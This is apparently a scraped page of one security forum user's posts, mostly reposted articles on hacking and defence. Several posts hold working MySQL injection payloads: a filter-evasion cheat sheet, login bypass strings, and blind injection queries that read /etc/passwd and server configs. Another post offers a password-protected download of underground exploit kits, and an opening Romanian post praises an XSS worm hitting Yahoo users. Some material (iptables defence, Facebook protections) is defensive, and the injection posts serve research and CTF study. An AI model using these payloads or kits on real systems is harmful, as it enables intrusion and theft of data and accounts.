    Ideea cu termenul "hack" e simpla: reclama. Ei doreau ca cei inscirsi sa foloseasca framework-urile lor: YQL, YUI... E clar: nu exista nicio legatura intre a folosi un framework si a fi hacker. Ce vreau sa spun: framework-urile te ajuta sa faci mai usor diverse actiuni. Folosind asa ceva, faci cu o linie de cod, ceea ce ar trebui sa faci cu 50, deoarece acele 50 de linii sunt deja scrise. Asta inseamna ca tu nu stii exact ce se intampla cand scrii linia respectiva de cod, si ajungi sa nu fii in stare sa faci acea actiune fara acel framework. Iar asta e total in contradictie cu termenul "hack", care presupune sa inveti ceva, sa descoperi, sa CREEZI ceva. E ca si cum i-ai da un program unui copil si l-ai pune sa il foloseasca. O sa zici ca e un script kiddie. Pe aceasta idee, dupa parerea mea, s-a mers si aici: promovarea framework-urilor lor, care presupune promovarea script-kiddingului pana la urma. Legat de proiectul lui Pax si Cheater ar fi mai multe de spus. In primul rand acesta e mai apropiat de termenul "hack" decat gramada de rahaturi imputite, stupide, jalnice si inutile, pe care nu ar da nici parintii celor care le-au facut 2 bani. Ideea a fost originala: "Vasile" intra pe o pagina si bum: se trezeste ca ofera acces la contul sau lui "x" si "y" si ca trimite fara sa vrea mesaj la toata lista de messenger cu acel link. E un atac direct la adresa securitatii celor de la Yahoo!, deci are legatura directa cu termenul "hack". Problema a fost conexiunea la net, nu a avut timp sa arate demo-ul. Si cred ca cei de la Yahoo! nu sunt foarte familiarizati cu acest termen, de XSS, ca de altfel nici multi care au participat. Ca eveniment mi-a placut: am mancat, am baut, am discutat, atmosfera a fost placuta, a fost foarte bine organizat, foarte strict si totul a fost foarte bine pus la punct.
  13. Nytro
    Linux exploit development part 4 Authored by sickness Posted May 15, 2011 Whitepaper called Linux exploit development part 4 - ASCII armor bypass + return-to-plt. Download: http://packetstormsecurity.org/files/download/101426/lewt4-bypass.pdf http://www.exploit-db.com/download_pdf/17286
  14. Nytro
    KisMAC- Wireless Security Tool For MAC OS As discussed so many topics for both Linux and Windows operating system, now this article will talk about the Wireless LAN (WLAN) security tool that are available for MAC operating system. This article is linked with the series article of Wardriving. Wardriving a act of searching/locating and exploit a access point. If you are a close user of MAC operating system so this tool is for you, KisMAC is a free, open source wireless stumbling and security tool for Mac OS X. Kismac is a replica of netstumbler for windows and Kismet for Linux, the overall idea of wardriving is same You can get and install Kismac on your MACbook and start driving the concept of gpsd is same. It has an advantage over MacStumbler / iStumbler / NetStumbler in that it uses monitor mode and passive scanning. KisMAC supports many third party USB devices: Intersil Prism2, Ralink rt2570, rt73, and Realtek rtl8187 chipsets. All of the internal AirPort hardware is supported for scanning. Key Features Reveals hidden / cloaked / closed SSIDs Shows logged in clients (with MAC Addresses, IP addresses and signal strengths) Mapping and GPS support Can draw area maps of network coverage PCAP import and export Support for 802.11b/g Different attacks against encrypted networks Deauthentication attacks AppleScript-able Kismet drone support (capture from a Kismet drone) Cracking Support Bruteforce attacks against LEAP, WPA and WEP Weak scheduling attack against WEP Newsham 21-bit attack against WEP Download: http://kismac-ng.org/ Tutorial: http://trac.kismac-ng.org/wiki/tutorials Sursa: KisMAC- Wireless Security Tool For MAC OS | Ethical Hacking-Your Way To The World OF IT Security
  15. Nytro
    USB sniffing on linux March 18th, 2009 The linux kernel has a facility called “usbmon” which can be used to sniff the USB bus. It’s been in there for ages, and the output is really easy to collect, even from the command line shell. Simply mount debugfs and insmod the usbmon module: mount -t debugfs none_debugs /sys/kernel/debug modprobe usbmon Then you can just cat USB traffic like this: cat /sys/kernel/debug/usbmon/1u It all comes out in an ASCII dump format which is easily parsed. Every USB bus also has a device file where you can sniff the raw packets straight off the wire. More info in the usbmon documentation. But while it’s all easily parsed if you need it, there aren’t really any tools around that do it for you. That is… except for libpcap. Libpcap is the power behind the throne of the venerable tcpdump tool. Tcpdump is not much more than a command line parser and pretty-printer of various network protocols. The heavy duty lifting is done by libpcap, not least by providing a cross-platform API for sniffing devices, something that is otherwise non-standard and different on every platform. It’s great, I’ve used it before (in capstats) and it’s very easy to use. Libpcap on linux supports usbmon sniffing, which means you can use tcpdump to sniff a USB port and write this to a capture file. But best of all: wireshark, the all-singing all-dancing network analyzer that uses tcpdump capture files, has USB support as well. So this is the result: The screenshot shows a filter applied to only see device 18 on the sniffed USB bus. That’s an arduino, i.e. an FTDI USB-serial chip. The FTDI chips send status updates to the USB host system every 16ms (!). The status update consists of a two-byte message (described here). This is actually present in every packet coming in from the FTDI chip; status updates just don’t have any other data. So for a clean sniffing session from the arduino, we want to filter out any packets that are < 3 bytes in length. The end result is serial data which the arduino sent to the host system. The screenshot shows a session on my arduino shell, arsh. This is great stuff – wireshark includes a massive amount of analysis tools and lots of options for filtering and otherwise massaging your captured data. You need relatively recent versions of libpcap, tcpdump and wireshark for this. I compiled all three of these out of their respective repositories (easy compile all). On my ubuntu system, the libpcap version was particularly old. Tcpdump doesn’t have a pretty-printer for USB data yet, so you can only dump to a capture file for processing by wireshark. Sursa: bert’s blog » Blog Archive » USB sniffing on linux
  16. Nytro
    26 Underground Hacking Exploit Kits available for Download ! : The Hacker News List of Hacking Exploit Kits : Unknow Tor Target-Exploit Smart pack RDS My poly sploit multisploit mypack-009 mypack-091 mypack-086 mypack-081 Mpack Infector Ice-pack-1 Ice-pack-2 Ice-pack-3 G-pack Fire pack -1 Fire Pack -2 Fiesta -1 Fiesta -2 Cry 217 Armitage Adpack -1 Adpack -2 0x88 Download: http://www.multiupload.com/EFDCHHZ9ZD Password: thn Sursa: 26 Underground Hacking Exploit Kits available for Download ! ~ THN : The Hackers News
  17. Nytro
    Eu "sunt" din Bucuresti. O sa vin pe la 8 - 8:20 acolo. Dar nu stiu cum sa facem. Eu o sa ma intalnesc cu Cheater. Puteti veni cu tricourile "Fan RST".
  18. Nytro
    NetBSD Internals The NetBSD Developers Copyright © 2006, 2007, 2008, 2009, 2010 The NetBSD Foundation All brand and product names used in this guide are or may be trademarks or registered trademarks of their respective owners. NetBSD® is a registered trademark of The NetBSD Foundation, Inc. Published: 2010/03/06 16:30:38 $NetBSD: index.html,v 1.18 2010/04/30 16:19:12 jakllsch Exp $ Table of Contents Purpose of this book 1. Memory management 1.1. The UVM virtual memory manager 1.2. Managing wired memory 2. File system internals 2.1. vnode layer overview 2.2. VFS layer overview 2.3. File systems overview 2.4. Initialization and cleanup 2.5. Mounting and unmounting 2.6. File system statistics 2.7. vnode management 2.8. The root vnode 2.9. Path name resolution procedure 2.10. File management 2.11. Symbolic link management 2.12. Directory management 2.13. Special nodes 2.14. NFS support 2.15. Step by step file system writing 3. Processes and threads 3.1. Process startup 3.2. Traps and system calls 3.3. Processes and threads creation 3.4. Processes and threads termination 3.5. Signal delivery 3.6. Thread scheduling 4. Networking 4.1. Routing 4.2. Sockets 4.3. mbufs 4.4. IP layer 4.5. UDP 4.6. TCP 5. Networking Services 5.1. IEEE 802.11 5.2. ISDN 5.3. IPSec 5.4. Networking pseudo-devices 5.5. Packet Filters 6. Regression testing 6.1. Testing file systems A. Acknowledgments A.1. Authors A.2. License B. Bibliography Bibliography Tutorial: http://netbsd.org/docs/internals/en/index.html
  19. Nytro
    SQLi filter evasion cheat sheet (MySQL) This week I presented my experiences in SQLi filter evasion techniques that I have gained during 3 years of PHPIDS filter evasion at the CONFidence 2.0 conference. You can find the slides here. For a quicker reference you can use the following cheatsheet. More detailed explaination can be found in the slides or in the talk (video should come online in a few weeks). Basic filter Comments ‘ or 1=1# ‘ or 1=1– - ‘ or 1=1/* (MySQL < 5.1) ' or 1=1;%00 ' or 1=1 union select 1,2 as ` ' or#newline 1='1 ' or– -newline 1='1 ' /*!50000or*/1='1 ' /*!or*/1='1 Prefixes + – ~ ! ‘ or –+2=- -!!!’2 Operators ^, =, !=, %, /, *, &, &&, |, ||, , >>, <=, <=, ,, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL Whitespaces %20 %09 %0a %0b %0c %0d %a0 /**/ ‘or+(1)sounds/**/like“1“–%a0- ‘union(select(1),tabe_name,(3)from`information_schema`.`tables`)# Strings with quotes SELECT ‘a’ SELECT “a” SELECT n’a’ SELECT b’1100001? SELECT _binary’1100001? SELECT x’61? Strings without quotes ‘abc’ = 0×616263 Aliases select pass as alias from users select pass aliasalias from users select pass`alias alias`from users Typecasting ‘ or true = ’1 # or 1=1 ‘ or round(pi(),1)+true+true = version() # or 3.1+1+1 = 5.1 ‘ or ’1 # or true Compare operator typecasting select * from users where ‘a’='b’='c’ select * from users where (‘a’='b’)=’c’ select * from users where (false)=’c’ select * from users where (0)=’c’ select * from users where (0)=0 select * from users where true select * from users Authentication bypass ‘=’ select * from users where name = ”=” select * from users where false = ” select * from users where 0 = 0 select * from users where true select * from users Authentication bypass ‘-’ select * from users where name = ”-” select * from users where name = 0-0 select * from users where 0 = 0 select * from users where true select * from users Function filter General function filtering ascii (97) load_file/*foo*/(0×616263) Strings with functions ‘abc’ = unhex(616263) ‘abc’ = char(97,98,99) hex(‘a’) = 61 ascii(‘a’) = 97 ord(‘a’) = 97 ‘ABC’ = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36)) Strings extracted from gadgets collation(\N) // binary collation(user()) // utf8_general_ci @@time_format // %H:%i:%s @@binlog_format // MIXED @@version_comment // MySQL Community Server (GPL) dayname(from_days(401)) // Monday dayname(from_days(403)) // Wednesday monthname(from_days(690)) // November monthname(from_unixtime(1)) // January collation(convert((1)using/**/koi8r)) // koi8r_general_ci (select(collation_name)from(information_schema.collations)where(id)=2) // latin2_czech_cs Special characters extracted from gadgets aes_encrypt(1,12) // 4çh±{?”^c×HéÉEa des_encrypt(1,2) // ‚GÒ/ïÖk @@ft_boolean_syntax // + -><()~*:""&| @@date_format // %Y-%m-%d @@innodb_log_group_home_dir // .\ Integer representations false: 0 true: 1 true+true: 2 floor(pi()): 3 ceil(pi()): 4 floor(version()): 5 ceil(version()): 6 ceil(pi()+pi()): 7 floor(version()+pi()): 8 floor(pi()*pi()): 9 ceil(pi()*pi()): 10 concat(true,true): 11 ceil(pi()*pi())+true: 11 ceil(pi()+pi()+version()): 12 floor(pi()*pi()+pi()): 13 ceil(pi()*pi()+pi()): 14 ceil(pi()*pi()+version()): 15 floor(pi()*version()): 16 ceil(pi()*version()): 17 ceil(pi()*version())+true: 18 floor((pi()+pi())*pi()): 19 ceil((pi()+pi())*pi()): 20 ceil(ceil(pi())*version()): 21 concat(true+true,true): 21 ceil(pi()*ceil(pi()+pi())): 22 ceil((pi()+ceil(pi()))*pi()): 23 ceil(pi())*ceil(version()): 24 floor(pi()*(version()+pi())): 25 floor(version()*version()): 26 ceil(version()*version()): 27 ceil(pi()*pi()*pi()-pi()): 28 floor(pi()*pi()*floor(pi())): 29 ceil(pi()*pi()*floor(pi())): 30 concat(floor(pi()),false): 30 floor(pi()*pi()*pi()): 31 ceil(pi()*pi()*pi()): 32 ceil(pi()*pi()*pi())+true: 33 ceil(pow(pi(),pi())-pi()): 34 ceil(pi()*pi()*pi()+pi()): 35 floor(pow(pi(),pi())): 36 @@new: 0 @@log_bin: 1 !pi(): 0 !!pi(): 1 true-~true: 3 log(-cos(pi())): 0 -cos(pi()): 1 coercibility(user()): 3 coercibility(now()): 4 minute(now()) hour(now()) day(now()) week(now()) month(now()) year(now()) quarter(now()) year(@@timestamp) crc32(true) Extract substrings substr(‘abc’,1,1) = ‘a’ substr(‘abc’ from 1 for 1) = ‘a’ substring(‘abc’,1,1) = ‘a’ substring(‘abc’ from 1 for 1) = ‘a’ mid(‘abc’,1,1) = ‘a’ mid(‘abc’ from 1 for 1) = ‘a’ lpad(‘abc’,1,space(1)) = ‘a’ rpad(‘abc’,1,space(1)) = ‘a’ left(‘abc’,1) = ‘a’ reverse(right(reverse(‘abc’),1)) = ‘a’ insert(insert(‘abc’,1,0,space(0)),2,222,space(0)) = ‘a’ space(0) = trim(version()from(version())) Search substrings locate(‘a’,'abc’) position(‘a’,'abc’) position(‘a’ IN ‘abc’) instr(‘abc’,'a’) substring_index(‘ab’,'b’,1) Cut substrings length(trim(leading ‘a’ FROM ‘abc’)) length(replace(‘abc’, ‘a’, ”)) Compare strings strcmp(‘a’,'a’) mod(‘a’,'a’) find_in_set(‘a’,'a’) field(‘a’,'a’) count(concat(‘a’,'a’)) String length length() bit_length() char_length() octet_length() bit_count() String case ucase lcase lower upper password(‘a’) != password(‘A’) old_password(‘a’) != old_password(‘A’) md5(‘a’) != md5(‘A’) sha(‘a’) != sha(‘A’) aes_encrypt(‘a’) != aes_encrypt(‘A’) des_encrypt(‘a’) != des_encrypt(‘A’) Keyword filter Connected keyword filtering (0)union(select(table_name),column_name,… 0/**/union/*!50000select*/table_name`foo`/**/… 0%a0union%a0select%09group_concat(table_name)…. 0?union all select all`table_name`foo from`information_schema`. `tables` OR, AND ‘||1=’1 ‘&&1=’1 ‘=’ ‘-’ OR, AND, UNION ‘ and (select pass from users limit 1)=’secret OR, AND, UNION, LIMIT ‘ and (select pass from users where id =1)=’a OR, AND, UNION, LIMIT, WHERE ‘ and (select pass from users group by id having id = 1)=’a OR, AND, UNION, LIMIT, WHERE, GROUP ‘ and length((select pass from users having substr(pass,1,1)=’a')) OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING ‘ and (select substr(group_concat(pass),1,1) from users)=’a ‘ and substr((select max(pass) from users),1,1)=’a ‘ and substr((select max(replace(pass,’lastpw’,”)) from users),1,1)=’a OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT ‘ and substr(load_file(‘file’),locate(‘DocumentRoot’,(load_file(‘file’)))+length(‘DocumentRoot’),10)=’a ‘=” into outfile ‘/var/www/dump.txt OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE ‘ procedure analyse()# ‘-if(name=’Admin’,1,0)# ‘-if(if(name=’Admin’,1,0),if(substr(pass,1,1)=’a',1,0),0)# Control flow case ‘a’ when ‘a’ then 1 [else 0] end case when ‘a’='a’ then 1 [else 0] end if(‘a’='a’,1,0) ifnull(nullif(‘a’,'a’),1) If you have any other useful tricks I forgot to list here please leave a comment. Sursa: SQLi filter evasion cheat sheet (MySQL) « Reiners’ Weblog
  20. Nytro
    MySQL Authentication Bypass I used this trick already to circumvent the PHPIDS filters in some earlier versions and mentioned it shortly in my article about MySQL Syntax. However when I used the same trick to circumvent the GreenSQL database firewall I noticed that this MySQL “bug” is not well known and so I decided to shortly write about it. Take a look at the following unsecure SQL query: SELECT * FROM table WHERE username = ‘$username‘ and password = ‘$password‘ Everyone knows about the simple authentication bypass using ‘ OR 1=1/* as username or perhaps ‘ OR 1=’1 for both inputs. But what MySQL allows too is a direct comparisons of 2 strings: SELECT * FROM table WHERE username = ‘string’='string‘ and password = ‘string’='string‘ Therefore you dont need any Operators like “OR” which are mostly detected by filters. To shorten your vector you can also use an emtpy string, narrowing your SQL injection to: username: ‘=’ password: ‘=’ Which ends in: SELECT * FROM table WHERE username = ‘‘=’‘ and password = ‘‘=’‘ and successfully bypasses authentication on MySQL. Of course you can use other operators then “equal” and use whitespaces and prefixes to build more complex vectors to circumvent filters. Please refer to the MySQL syntax article. I have also tested this behavior on MSSQL, PostgreSQL and Oracle which does not have the same behavior. What MySQL seems to allow is a triple comparison in a WHERE clause. That means you can use: SELECT * FROM users WHERE 1=1=1 SELECT * FROM users WHERE ‘a’='a’='a’ Interestingly the following queries also work: SELECT * FROM users WHERE ‘a’='b’='c’ SELECT * FROM users WHERE column=’b'=’c’ SELECT * FROM users WHERE column=column=1 That means if you compare strings it doesnt matter if they are equal and it seems like if you compare columns with Strings or Integers they will get typecasted. Lastly I would like to recommend a great article from Stefan Esser about another authentication bypass on MySQL. Updated: MySQL does not consider this as a bug. Please refer to the bugreport for detailed information. Again this shows how flexible the MySQL syntax is (intentionally). Sursa: MySQL Authentication Bypass « Reiners’ Weblog
  21. Nytro
    Blind SQL injection with load_file() Currently I am working a lot on RIPS but here is a small blogpost about a technique I thought about lately and wanted to share. While participating at the smpCTF I came across a blind SQL injection in level 2. After solving the challenge I checked for the FILE privilege: /level2/?id=1/**/and/**/(SELECT/**/is_grantable/**/FROM/**/information_schema.user_privileges/**/WHERE/**/privilege_type=0x66696C65/**/AND/**/grantee/**/like/**/0x25726F6F7425/**/limit/**/1)=0x59 Luckily the FILE privilege was granted which was not intended by the organizer. Since I had not solved level 1 at that time I thought it would be easier to read the PHP files to solve level 1. First I checked if reading files with load_file() worked at all and tried to read /etc/passwd: /level2/?id=1/**/and/**/!isnull(load_file(2F6574632F706173737764)) Since the webpage with id=1 was displayed the and condition must have been evaluated to true which means that the file could be read (load_file() returns null if the file can not be read). Before reading the PHP files I needed to find the webserver configuration file to find out where the DocumentRoot was configured. I used the same query as above to check for the existence of the following apache config files: $paths = array( "/etc/passwd", "/etc/init.d/apache/httpd.conf", "/etc/init.d/apache2/httpd.conf", "/etc/httpd/httpd.conf", "/etc/httpd/conf/httpd.conf", "/etc/apache/apache.conf", "/etc/apache/httpd.conf", "/etc/apache2/apache2.conf", "/etc/apache2/httpd.conf", "/usr/local/apache2/conf/httpd.conf", "/usr/local/apache/conf/httpd.conf", "/opt/apache/conf/httpd.conf", "/home/apache/httpd.conf", "/home/apache/conf/httpd.conf", "/etc/apache2/sites-available/default", "/etc/apache2/vhosts.d/default_vhost.include"); Update: There is an official list for Apache. Very useful. Webpage with id=1 was displayed for the file /etc/httpd/httpd.conf thus revealing that this file existed and could be read. Now it was time for the tricky part: I had only a true/false blind SQL injection which means that I could only bruteforce the configuration file char by char. Since the length of the file was more than 10000 chars this would have taken way too long. I decided to give little shots at the configuration file trying to hit the DocumentRoot setting or a comment nearby that identifies my current position. Each shot bruteforced 10 alphanumerical characters: /level2/?id=1/**/and/**/mid(lower(load_file(0x2F6574632F68747470642F68747470642E636F6E66)),$k,1)=0x$char I compared the few bruteforced characters to a known apache configuration file trying to map the characters to a common configuration comment. This worked for most of the character sequences but unfortunately almost every configuration file is a bit different so that it was not possible to calculate the correct offset of the DocumentRoot setting once another setting had been identified. I bruteforced only alphanumerical strings to save time. For example the bruteforced string “dulesthoselisted” could be mapped to the comment “modules (those listed by `httpd -l’)” and so on. After the 10th shot I luckily hit the DocumentRoot setting comment at offset 7467 and after this it was possible to calculate the correct offset for the beginning of the DocumentRoot setting and I could retrieve “srvhttpdhtdocs” (DocumentRoot: /srv/httpd/htdocs/). While that worked fine during the hectics of the CTF and was better than a bruteforce on the whole configuration file, I thought about it again yesterday and thought that this technique was plain stupid . If you know what you are looking for in a file (and mostly you do) you can easily find the correct offset with LOCATE(substr,str[,pos]) which will return the offset of a given substring found in a string. The following query instantly returns the next 10 characters after the DocumentRoot setting: substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+length('DocumentRoot'),10) and can then be bruteforced easily: mid(lower(substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+length('DocumentRoot'),10)),$k,1)=0x$char No magic here, but a helpful combination of mysql build in functions when reading files blindly. Sursa: Blind SQL injection with load_file() « Reiners’ Weblog
  22. Nytro
    Facebook Rolls Out Login Approvals and Security Protections Against Clickjacking and Self-XSS May 13th, 2011 By Josh Constine Facebook has released several new security features designed to thwart unauthorized logins, cross-site scripting, and clickjacking that trick users into sharing spam to the news feed. Login approvals require suspicious logins to be confirmed with a code texted to a user’s phone, while self-XSS and clickjacking protection warns users and requires them to confirm their actions when pasting links into their browser or clicking suspicious Like buttons. These protections should reduce the prevalence of hijacked accounts and highly visible spam in the news feed that perpetuate the public perception of Facebook as less safe than the rest of the internet. Facebook’s latest internal security efforts were announced alongside a new partnership with Web of Trust, a a crowd-sourced website reputation rating service that will be used to power alerts to Facebook users when they click malicious outbound links. Facebook has previously concentrated on improving security through user education and login protection features such as remote session logout and one-time passwords. Login Approvals Now Facebook is rolling out the two-factor authentication it announced last month. Users can visit Account -> Account Settings -> Settings -> Account Security to enable the feature, which will require them to verify their phone number. Once enabled, any time someone attempts to login to the account through a new or unrecognized device, they’ll have to enter a code sent to their phone via SMS. Users will also be notified the next time the successfully login of any suspicious attempts thwarted by the login approvals feature. Users could be temporarily locked out of their account if they have Login Approvals in the unlikely event that both their phone and their approved Facebook login device were lost or stolen. Still, the feature offers a strong additional layer of security for those who opt in to it. It can also serve to protect users who may share their password with a loved one for use on their regular login device, but who don’t want those people to access their account from elsewhere. Clickjacking Protection Clickjacking refers to when a malicious website conceals an active link beneath an image or other disguise to fool a user into clicking a link they didn’t intend to. In the case of Facebook, malicious sites sometimes conceal Like buttons beneath video players or appealing offers, leading users to inadvertently share the spam site to the news feed, drawing in more users to the scam. Facebook already has automated systems designed to identify and disable uses of the Like button for clickjack, as well as block or remove outbound links to clickjacking sites. Now Facebook as added additional protection against the tactic by requiring users to confirm they wanted to click a Like button that is suspected to be part of a clickjacking scheme. The Like won’t go through and stories won’t be published to the news feed unless the user confirms. This feature could cut down on one of the most prominent Facebook security threats as of late, which has spread through links that promise videos of racy or gruesome content. Self-XSS Protection Self-cross site scripting is a security threat in which a spam news feed story, wall posts, or Message asks users to copy malicious code into their browser, thereby causing a hacker’s message to be posted to additional friends. These threats are becoming increasingly sophisticated over the years (if you want to get deeper into the topic, be sure to check out security researcher Joey Tyson’s Social Hacking blog). The new security features detects when users attempt to paste malicious code into their browser, displays an alert explaining why the practice of copying code into a browser is dangerous, and prevents the code from being run. By mixing education in with technical security features, Facebook can protect users now and teach them to protect themselves in the future. Sursa: Facebook Rolls Out Login Approvals and Security Protections Against Clickjacking and Self-XSS
  23. Nytro
    Optimized Blind MySQL Injection Data Retrieval Posted on March 31, 2011 by Roberto Salgado I recently came across a paper titled Faster Blind MySQL Injection Using Bit Shifting by Jelmer de Hen describing a technique that allows the retrieval of data from a MySQL database in only 8 requests per character using bit shifting; this is a slight improvement from the traditional Bisection method. This got me thinking on how information could be extracted from the database in even less amount of requests and after a few hours of fooling around, this is what I came up with. AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1), 'a,b,c,d,e,f ,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#, $,%,^,&,*,(,),-,+,=,\,,.,",\',~,`,\\,|,{,},[,],:,;, ,')),1,1) FROM in formation_schema.tables LIMIT 1)=@a AND IF(@a!='',@a,SLEEP(5)); A quick explanation of how this query works and what it does: It starts off with your basic blind injection, selecting only 1 character at a time from the table SELECT MID(table_name,1,1) FROM information_schema.tables LIMIT 1 It then uses FIND_IN_SET(), to look for the position of the extracted character in the list. So for example, say the table is CHARACTER_SET, MID("CHARACTER_SET",1,1) = 'C', therefore the returned value for FIND_IN_SET('C', 'a,b,c') would be 3 (case insensitive). We then proceed to use BIN() to convert it to binary, BIN(3) = 11. Now that we've reduced the character to two possibilities, 1 or 0, we only have to check if the result is 1, if not we can assume it's 0. So BIN(3) = 11 would take 3 requests: Is the first digit 1? Yes. Is the second digit 1? Yes. Is the third digit 1? No, there is no third digit, so it triggers the SLEEP() function. Now we know that CAST(b'11' AS DEC) is 3 and that's the equivalent of 'c' on the list, all in 3 requests! Say your list contained 45 elements, BIN(45) = 101101, still only making the total amount of requests 7 for characters in later position on the list. I'm sure this could be optimized and greatly improved, possibly by removing the need for FIND_IN_SET() and using a more effective function. One idea would be to split the list in two requests, this way you can ensure the length of the binary doesn't grow too big. Downside: Query can be a bit longer than normal. Requires SLEEP() to know when you've reached the end of the binary. Another possible solution that doesn't require SLEEP(), but would require two different pages (test.php?id=0, test.php?id=1) could be done with something like this: IF((@a:=MID(BIN(FIND_IN_SET(MID((SELECT table_name FROM info rmation_schema.tables LIMIT 1),1,1),'a,b,c,d,e,f,g,h,i,j,k,l, m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,$,%,^,&, *,(,),-,+,=,\,,.,",\',~,`,\\,|,{,},[,],:,;, ')),1,1))!='',@a,0/0); UPDATE: Two things I just thought I should point out: This technique doesn't necessarily require FIND_IN_SET(). There are plenty of other similar functions that could be substituted in its place (locate, position, instr, field) just to name a few. Secondly, the use of quotations can be avoided. For example, FIND_IN_SET(0x33, CONCAT_WS(0x2C,0x31,0x32,0x33)); Sursa: Optimized Blind MySQL Injection Data Retrieval
  24. Nytro
    Linux Iptables Limit the number of incoming tcp connection / syn-flood attacks by LinuxTitli on June 26, 2005 A SYN flood is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system. This is a well known type of attack and is generally not effective against modern networks. It works if a server allocates resources after receiving a SYN, but before it has received the ACK. if Half-open connections bind resources on the server, it may be possible to take up all these resources by flooding the server with SYN messages. Syn flood is common attack and it can be block with following iptables rules: iptables -A INPUT -p tcp --syn -m limit --limit 1/s --limit-burst 3 -j RETURN All incoming connection are allowed till limit is reached: --limit 1/s: Maximum average matching rate in seconds --limit-burst 3: Maximum initial number of packets to match Open our iptables script, add the rules as follows: # Limit the number of incoming tcp connections # Interface 0 incoming syn-flood protection iptables -N syn_flood iptables -A INPUT -p tcp --syn -j syn_flood iptables -A syn_flood -m limit --limit 1/s --limit-burst 3 -j RETURN iptables -A syn_flood -j DROP #Limiting the incoming icmp ping request: iptables -A INPUT -p icmp -m limit --limit 1/s --limit-burst 1 -j ACCEPT iptables -A INPUT -p icmp -m limit --limit 1/s --limit-burst 1 -j LOG --log-prefix PING-DROP: iptables -A INPUT -p icmp -j DROP iptables -A OUTPUT -p icmp -j ACCEPT First rule will accept ping connections to 1 per second, with an initial burst of 1. If this level crossed it will log the packet with PING-DROP in /var/log/message file. Third rule will drop packet if it tries to cross this limit. Fourth and final rule will allow you to use the continue established ping request of existing connection. Where, ??limit rate: Maximum average matching rate: specified as a number, with an optional ‘/second’, ‘/minute’, ‘/hour’, or ‘/day’ suffix; the default is 3/hour. ??limit?burst number: Maximum initial number of packets to match: this number gets recharged by one every time the limit specified above is not reached, up to this number; the default is 5. You need to adjust the –limit-rate and –limit-burst according to your network traffic and requirements. Let us assume that you need to limit incoming connection to ssh server (port 22) no more than 10 connections in a 10 minute: iptables -I INPUT -p tcp -s 0/0 -d $SERVER_IP --sport 513:65535 --dport 22 -m state --state NEW,ESTABLISHED -m recent --set -j ACCEPT iptables -I INPUT -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 600 --hitcount 11 -j DROP iptables -A OUTPUT -p tcp -s $SERVER_IP -d 0/0 --sport 22 --dport 513:65535 -m state --state ESTABLISHED -j ACCEPT Sursa: Linux Iptables Limit the number of incoming tcp connection / syn-flood attacks
  25. Nytro
    Nu l-am testat, nu ma pasioneaza astfel de lucruri. Aveti grija, e posibil sa fie fisiere infectate.
×
×
  • Create New...